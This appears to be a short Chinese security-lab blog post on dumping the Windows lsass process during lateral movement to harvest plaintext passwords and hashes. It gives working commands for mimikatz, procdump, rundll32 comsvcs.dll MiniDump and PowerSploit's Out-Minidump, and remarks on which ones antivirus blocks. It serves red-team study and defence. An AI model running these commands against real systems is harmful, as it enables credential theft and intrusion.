戟星安全实验室
本文约1084字,阅读约需3分钟。
前言
系列文章第二部曲《内网系列文章》
在做内网横向移动时,经常会dump进程lsass,从中获取明文密码或hash
mimikatz
mimikatz内网获取密码和hash最常用的工具
直接读取Lsass进程
privilege::debug
sekurlsa::logonpasswords
如果不做免杀就会直接被av查杀掉
procdump
ProcDump是微软签名的合法二进制文件,被提供用于转储进程内存
正常执行
procdump.exe -ma lsass.exe 1.txt360直接拦截
comsvcs.dll
系统自带comsvs.dll,通过导出函数MiniDump实现dump内存
默认是禁用SeDebugPrivilege权限
先查看lsass进程id
tasklist | findstr lsass.exe使用管理员权限的powershell执行rundll32的命令dump指定进程内存文件,powershell管理员权限下SeDebugPrivilege是启用状态
rundll32.exe comsvcs.dll,MiniDump 812 lsass.dmp full[hw1] [hw1]使用mimikatz解dump时注意mimikatz
360直接拦截
Out-Minidump
使用PowerSploit 的Out-MiniDump模块,PowerSploit是一个基于 Powershell 的渗透工具包
github链接地址:https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Out-Minidump.ps1Import-Module .\Out-Minidump.ps1导入Get-Process lsass | Out-Minidump执行
360拦截
任务管理器
简单实用的方法,任务管理器详细信息中找到lsass.exe进程,创建转储文件
往期回顾
声明
由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,戟星安全实验室及文章作者不为此承担任何责任。
戟星安全实验室拥有对此文章的修改和解释权。如欲转载或传播此文章,必须保证此文章的完整性,包括版权声明等全部内容。未经戟星安全实验室允许,不得任意修改或者增减此文章内容,不得以任何方式将其用于商业目的。
戟星安全实验室
# 长按二维码 || 点击下方名片 关注我们 #
如有侵权请联系:admin#unsafe.sh